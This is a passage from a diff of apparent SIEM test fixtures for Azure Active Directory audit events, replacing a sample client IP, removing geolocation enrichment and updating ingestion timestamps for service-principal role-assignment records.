@@ -10047,12 +9183,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036378400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125113600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -10078,25 +9214,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -10110,7 +9228,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -10246,7 +9364,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -10258,12 +9376,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036382600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125120100Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -10289,25 +9407,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
